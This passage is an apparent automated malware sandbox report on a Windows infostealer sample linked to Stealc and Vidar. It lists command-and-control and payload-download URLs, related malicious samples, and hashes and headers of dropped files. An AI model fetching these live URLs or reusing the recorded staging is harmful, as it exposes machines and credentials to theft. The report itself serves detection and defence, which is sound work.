                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016b4s45TboUL.exe, 00000000.00000003.1761148911.0000000020EF1000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17b4s45TboUL.exe, 00000000.00000003.1761148911.0000000020EF1000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYmb4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpfalse
                                                unknown
                                                https://www.ecosia.org/newtab/b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://45.91.200.39/eaa194fa594ff9c2.php~1.db4s45TboUL.exe, 00000000.00000003.1764389556.00000000009FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://45.91.200.39/4eb4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://gosp.clinicavertigen.com/tmpp/chrome_131.exeacb4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://ac.ecosia.org/autocomplete?q=b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://45.91.200.39b4s45TboUL.exe, 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmptrue
                                                        unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchb4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://gosp.clinicavertigen.com/#b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://45.91.200.39/eaa194fa594ff9c2.phpsition:b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpfalse
                                                            unknown
                                                            https://gosp.clinicavertigen.com/pDatab4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://gosp.clinicavertigen.com/tmpp/chrome_131.exenb4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://45.91.200.39/cb9cc10e175e1537/sqlite3.dllqKob4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.sqlite.org/copyright.html.b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://gosp.clinicavertigen.com/b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://45.91.200.39FHDHDAb4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      87.106.236.48
                                                                      gosp.clinicavertigen.comGermany
                                                                      8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                      45.91.200.39
                                                                      unknownNetherlands
                                                                      204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1545664
                                                                      Start date and time:2024-10-30 19:46:06 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 8m 23s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:44
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:b4s45TboUL.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:b6f6e51f0efa952f3ffcaab9dd5895db.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.adwa.spyw.evad.winEXE@61/19@2/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 33.3%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 89
                                                                      • Number of non-executed functions: 112
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target HIIDGCGCBF.exe, PID 2828 because there are no executed function
                                                                      • Execution Graph export aborted for target updater.exe, PID 1740 because there are no executed function
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: b4s45TboUL.exe
                                                                      TimeTypeDescription
                                                                      14:47:20API Interceptor1x Sleep call for process: HIIDGCGCBF.exe modified
                                                                      14:47:21API Interceptor19x Sleep call for process: powershell.exe modified
                                                                      14:47:38API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      87.106.236.482DpxPyeiUv.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • campuspersever.es/chrome_93.exe
                                                                      45.91.200.39qPNf2kJgzI.exeGet hashmaliciousStealcBrowse
                                                                      • 45.91.200.39/eaa194fa594ff9c2.php
                                                                      tdnPqG0jmS.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 45.91.200.39/eaa194fa594ff9c2.php
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      gosp.clinicavertigen.comtdnPqG0jmS.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 87.106.236.48
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ON-LINE-DATAServerlocation-NetherlandsDrontenNLqPNf2kJgzI.exeGet hashmaliciousStealcBrowse
                                                                      • 45.91.200.39
                                                                      tdnPqG0jmS.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 45.91.200.39
                                                                      y3c6AzPbtt.exeGet hashmaliciousStealcBrowse
                                                                      • 45.88.105.194
                                                                      kj5la5X8gv.exeGet hashmaliciousStealcBrowse
                                                                      • 45.88.105.194
                                                                      NGy4YdKSwE.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 45.88.105.194
                                                                      5BQwrSLxIZ.exeGet hashmaliciousStealcBrowse
                                                                      • 45.88.76.238
                                                                      WAOfus3Nqk.exeGet hashmaliciousStealcBrowse
                                                                      • 45.88.76.238
                                                                      2DpxPyeiUv.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 45.88.76.238
                                                                      5lB5493t9F.exeGet hashmaliciousStealcBrowse
                                                                      • 77.83.175.105
                                                                      JVLkkfzSKW.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 77.83.175.105
                                                                      ONEANDONE-ASBrauerstrasse48DEtdnPqG0jmS.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 87.106.236.48
                                                                      Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                      • 217.76.156.252
                                                                      HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                      • 217.160.0.118
                                                                      jew.ppc.elfGet hashmaliciousMiraiBrowse
                                                                      • 82.223.130.245
                                                                      2DpxPyeiUv.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 87.106.236.48
                                                                      1.rtfGet hashmaliciousRemcosBrowse
                                                                      • 217.160.66.193
                                                                      ingswhic.docGet hashmaliciousRemcosBrowse
                                                                      • 217.160.66.193
                                                                      Markus-Dokumenten-Kaufvertrag.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 217.160.0.121
                                                                      Kvidistante.vbsGet hashmaliciousGuLoaderBrowse
                                                                      • 217.160.0.163
                                                                      2025+Policies_645622_929-5.pdfGet hashmaliciousUnknownBrowse
                                                                      • 82.223.67.146
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      37f463bf4616ecd445d4a1937da06e19rCommercialoffer_Technicaloffer_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 87.106.236.48
                                                                      Justificante de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 87.106.236.48
                                                                      rPO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 87.106.236.48
                                                                      rPO-000172483.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 87.106.236.48
                                                                      Ppto.24265.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 87.106.236.48
                                                                      Factura Honorarios 2024-10.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 87.106.236.48
                                                                      Stadigheder43.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 87.106.236.48
                                                                      Forreste.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 87.106.236.48
                                                                      Ppto.24265.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 87.106.236.48
                                                                      Fernissagerne.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 87.106.236.48
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\ProgramData\Google\Chrome\updater.exefile.exeGet hashmaliciousUnknownBrowse
                                                                        C:\ProgramData\HIIDGCGCBF.exefile.exeGet hashmaliciousUnknownBrowse
                                                                          C:\ProgramData\chrome.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                              0T32Kz4dZU.exeGet hashmaliciousStealc, VidarBrowse
                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  tdnPqG0jmS.exeGet hashmaliciousStealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                              Process:C:\Users\user\Desktop\b4s45TboUL.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):106496
                                                                                              Entropy (8bit):1.1358696453229276
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\b4s45TboUL.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.8553638852307782
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\ProgramData\HIIDGCGCBF.exe
                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):8662936
                                                                                              Entropy (8bit):7.927707184368659
                                                                                              Encrypted:false
                                                                                              SSDEEP:196608:weeq5JeITAZfUnRGPG+FyWlaYVNcT5qagonrxz/4fBiCY1MFU:u4J48svIiuT5PvQfBi3eFU
                                                                                              MD5:0F247FC98A73243773ED3614FFAD3118
                                                                                              SHA1:1BB4ECA56217F784738CB9108F18BF4C6B67F67E
                                                                                              SHA-256:0CF1E07D9FF27240D711390121E4EA7EB6F84E3C150AE9BB6D860E2819AD61E5
                                                                                              SHA-512:50414ED73F76AA6280AFF26D1AA7BFD99F49E6D6C8CD9470692674C1414DD9248CBD602028FC62335BC050179807B8290A27924DBD7D87BE620153BB9B56081A
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....!g.........."...........l.....X..........@....................................zz....`.................................................B0n.d....Pn.H...................................................(@n.(................................................... &........o.................. ..` .*... ..<....t..............@..@ .l..P....Q.................@... ......m.......R.............@..@ ......m.......R.............@..@ ......n.......R.............@... P.....n.n.....R.............@..@ x.... n.i.....R.............@..B.imports.....0n.......R.............@....tls.........@n.......R..................rsrc........Pn...... R.............@..@.themida..W..`n......$R.............`....boot.....1.......1..$R.............`..`.reloc................................@........................................................
                                                                                              Process:C:\Users\user\Desktop\b4s45TboUL.exe
                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):8662936
                                                                                              Entropy (8bit):7.927707184368659
                                                                                              Encrypted:false
                                                                                              SSDEEP:196608:weeq5JeITAZfUnRGPG+FyWlaYVNcT5qagonrxz/4fBiCY1MFU:u4J48svIiuT5PvQfBi3eFU
                                                                                              MD5:0F247FC98A73243773ED3614FFAD3118
                                                                                              SHA1:1BB4ECA56217F784738CB9108F18BF4C6B67F67E
                                                                                              SHA-256:0CF1E07D9FF27240D711390121E4EA7EB6F84E3C150AE9BB6D860E2819AD61E5
                                                                                              SHA-512:50414ED73F76AA6280AFF26D1AA7BFD99F49E6D6C8CD9470692674C1414DD9248CBD602028FC62335BC050179807B8290A27924DBD7D87BE620153BB9B56081A
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....!g.........."...........l.....X..........@....................................zz....`.................................................B0n.d....Pn.H...................................................(@n.(................................................... &........o.................. ..` .*... ..<....t..............@..@ .l..P....Q.................@... ......m.......R.............@..@ ......m.......R.............@..@ ......n.......R.............@... P.....n.n.....R.............@..@ x.... n.i.....R.............@..B.imports.....0n.......R.............@....tls.........@n.......R..................rsrc........Pn...... R.............@..@.themida..W..`n......$R.............`....boot.....1.......1..$R.............`..`.reloc................................@........................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):1.1819896295361507
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:EcGa0rvPOavAjKGZrd2EXJtzuiF3Z24IO8XA:VGhrvPOaYjFRjzuiF3Y4IO8X
                                                                                              MD5:25A1B61E3B00873C750AA3D1F439437F
                                                                                              SHA1:43EB6AF6FD87998D5042D056767FD3FA1B0D48BF
                                                                                              SHA-256:B5B1A770633959DA24C73B3804F97DBF9043F072E5401C3BCECD5E5502979707
                                                                                              SHA-512:DAD5BFDCCE741BA6F82CB169C7880EDDA478E3409053D528AA57AB111205B2F13B81B809738A200B3C248AB915F99943EAEE61FC0FC3D5F2D8C24E149DFAD228
                                                                                              Malicious:true
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.7.8.7.6.4.2.7.7.1.9.8.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.7.8.7.6.4.3.3.5.0.1.0.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.a.f.9.8.4.d.-.a.0.e.d.-.4.b.6.e.-.9.7.d.7.-.7.7.9.e.d.c.4.d.5.b.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.8.2.e.d.1.f.-.b.8.b.e.-.4.b.0.8.-.b.7.8.7.-.8.9.8.3.8.f.7.5.b.a.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.4.s.4.5.T.b.o.U.L...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.9.c.-.0.0.0.1.-.0.0.1.4.-.c.c.c.4.-.1.e.1.9.f.c.2.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.3.8.8.5.d.1.2.3.0.f.e.0.5.9.d.4.c.3.4.0.2.0.3.c.2.4.8.2.f.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.d.a.d.b.1.1.d.9.0.a.d.b.3.8.d.c.7.9.8.a.c.a.e.7.5.5.0.0.4.e.d.8.e.9.3.b.0.8.8.f.!.b.4.s.4.5.T.b.o.U.L...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 14 streams, Wed Oct 30 18:47:23 2024, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):68216
                                                                                              Entropy (8bit):2.690279381947631
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:OMpkB2nveWNRk8br1r9LHfFJI5iroUCawQzqIX:Jk0vjNRk8brl9ZJ+i8ILzlX
                                                                                              MD5:58DC69D98C40411E5DB69ED4859F2BCA
                                                                                              SHA1:226F4EF8C10D4224D70AB6FB1E51E4997352584A
                                                                                              SHA-256:6C4C762687D1A316115A9BAFD6AEB74F32C5ACE5E4325E082ED29CFD0220A718
                                                                                              SHA-512:A9F6030F97A509B1D64DADA650695D12AA432A0070D26B6921C535969E6E0B3D8F6C466EF63109AB26E6D44003475D7E7934085DBD5A90C448D6442F7FB413CD
                                                                                              Malicious:false
                                                                                              Preview:MDMP..a..... .......;."g............4...........t#..<............<..........T.......8...........T...........(j..P............*...........,..............................................................................eJ......4-......GenuineIntel............T...........!."g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8344
                                                                                              Entropy (8bit):3.6958659427066847
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:R6l7wVeJdh6VH6Y93SUY6gmf2nav3pDt89bfEsfX1m:R6lXJL696YtSUY6gmf2naAf3fI
                                                                                              MD5:1CDE33264AC772131489A78A6654791D
                                                                                              SHA1:A1413C7577D6FD6D3B25C1754CB15ABD0DAF3410
                                                                                              SHA-256:9DA2901992DDC4FD3E403F9E56A91B03F376975E48FE48A09D418FAC313038CE
                                                                                              SHA-512:D9B8A7AFA618219AF1F5E0EAF229163A7DB6D87D5C1ADEE10C5D8EFA6D9A2CFE868D3FF6A9C59575F7370EF6D3B30E21BCE95CD13A78D23F69A45C4FF25CE8FB
                                                                                              Malicious:false
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.5.6.<./.P.i.
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4579
                                                                                              Entropy (8bit):4.46126353681735
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwWl8zs1Jg77aI9peWpW8VYSPYm8M4J2hLfFv+q8lju+ZjczMd:uIjfPI7/f7VvSJKEZgzMd
                                                                                              MD5:C147FECE12DEBE1370825E3D25EF6913
                                                                                              SHA1:90045D1881C47AD05CECF503D1BFF39AA0D9C667
                                                                                              SHA-256:9B7BCAABE58510D86811FCE5F1C996069D1B3F61B3FECE71B9F0A3F9395B5E1A
                                                                                              SHA-512:E19A3DA0663E300154FDA28AC3A09E1385314E70FEE965AC320FE8F94FF4835D87A256FD8CADB67E70473FF1E0292AE59A62CFE1FFAC2AF92382DE4B183D0E6D
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="566510" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):76818
                                                                                              Entropy (8bit):3.029117860343438
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:3iY2Xqf7waF+RJV4MyApvW8Zvvz1VfteHwZBr1Fy/RBosc8l5dy:yofDF+RJiMe8ZDvfcHwfLy/R9c8lDy
                                                                                              MD5:BCA0C2AE2C629D2025A0121825D8FADC
                                                                                              SHA1:5DFA664E93BED0A47D83837DAC5B3915645D610F
                                                                                              SHA-256:4FC1B7B37B08D3DC16E9026EDCC7E85000FC03AEDF798581F483BFDC76FDA9E2
                                                                                              SHA-512:24CD405C2BE150B85636922BB9F97624926E1A8D29F3607FC4FEB33B61EB7E24CCF17956CCFBF7E5FFDBFF1B4543253E61B7CE8C66172753E6B752CB39185D28
                                                                                              Malicious:false
